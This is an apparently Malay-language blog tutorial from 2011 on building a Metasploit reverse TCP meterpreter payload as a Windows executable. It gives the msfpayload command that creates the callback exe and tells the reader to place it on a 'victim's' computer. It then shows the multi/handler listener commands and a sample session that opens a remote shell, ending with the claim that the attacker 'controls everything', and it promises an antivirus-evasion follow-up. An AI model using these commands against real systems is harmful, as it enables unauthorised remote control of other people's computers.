2011-11-05

Metasploit (Backtrack)



SUBJEK YANG TERDAPAT DI DALAM ARTIKEL SANGAT SUKAR DIFAHAMI,ANDA PERLULAH MEMAHAMI PERKARA ASAS TERLBIH DAHULU




Dalam video ini, saya tunjukkan kepada anda bagaimana untuk membuat asas reverse TCP payload  dalam metasploit

Sedikit Info Tentang Metasploit





"Metasploit menyediakan maklumat yang berguna dan pentesting, penyelidik keselamatan, dan pemajutandatangan IDS. Projek ini telah diwujudkan untuk memberi maklumat mengenai teknik-teknik mengeksploitasi dan untuk mewujudkan pengetahuan yang berfungsi untuk pemaju mengeksploitasi dan profesional keselamatan. Alat dan maklumat di dalam laman web ini disediakan untuk penyelidikan keselamatan undang-undang dan tujuan ujiansahaja. Metasploit adalah projek sumber terbuka. "
http://www.metasploit.com/


Program ini boleh digunakan pada  Windows dan Linux (saya cuba guna pada Windows dan membenci) dan dikemas kini setiap hari
Salah satu program, percuma untuk pentesting /exploit


Dalam video ini menunjukkan kepada anda bagaimana untukmenggunakan program dalam Linux










Pada video ini


saya tunjukkan kepada anda asas Reverse_tcp payload. Buka terminal dan taipkan "./msfpayload/windows/meterpreter/reverse_tcp LHOST=<ip anda> LPORT=4444> x> /root/<file.exe>


Penerangan

LHOST adalah alamat dimana exe akan bersambung suma kepada samaada melalui ip luaran atau dalaman. Untuk mengetahui alamat IP dalaman anda pada linux ,hanya perlu buka terminal (CTRL+ALT+T) dan taip ifconfig dan anda akan dapat lihat sendiri

LPORT

LPPORT adalah port exe kamu akan bersambung balik kepada anda dan memastikan ianya menghatar data dengan tepat

pada baris "x> /root/<file.exe>" ianya adalah asas yang menyatakan exe adalah x dan meletakkanya pada root/file.exe.
File .exe hanya akan berkesan pada Windows




" ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.66 LPORT=4444 x > /root/reverse_tcp.exe "

terdapat arahan tambahan yang oleh menyembunyikan dari AV (anti virus), tetapi saya akan tulis pada artikel akan datang kerana ini hanyalah asas, dan bagaimana untuk lakukanya

Seterusnya copy file.exe yang telah kamu buat dan letakkan pada komputer mangsa
Jadi kita perlu buka listener supaya file.exe akan bersambung semula supaya kita dapat session
buka metasploit console (msfconsole) dan taipkan ini


"use multi/handler"
"set PAYLOAD windows/meterpreter/reverse_tcp"
"set LHOST 192.168.1.1"
"set LPORT 4444"
"exploit"


akan keluar


msf > use multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.1
LHOST => 192.168.1.1
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit
[*] Started reverse handler
[*] Starting the payload handler...







Sekarang kita telah dapat Listening server, menunggu untuk disambung semula. Perlu diingatkan LHOST dan LPORT tetapan anda sendiri
Apabila file.exe telah diklik akan keluarlah :

msf exploit(handler) > exploit
[*] Started reverse handler on port 4444
[*] Starting the payload handler...
[*] Sending stage (72346 bytes)
[*] Sleeping before handling stage...
[*] Meterpreter session 1 opened (192.168.1.1:4444 -> 192.168.1.2:1060)

meterpreter >




Sekarang kita telah dapat  meterpreter session adan dapat kawal segalanya

Tutorial akan datang, saya akan menunkkan anda bagaimana menggunakan arahan meterpreter

Tiada ulasan:

Catat Ulasan

LinkWithin

Related Posts Plugin for WordPress, Blogger...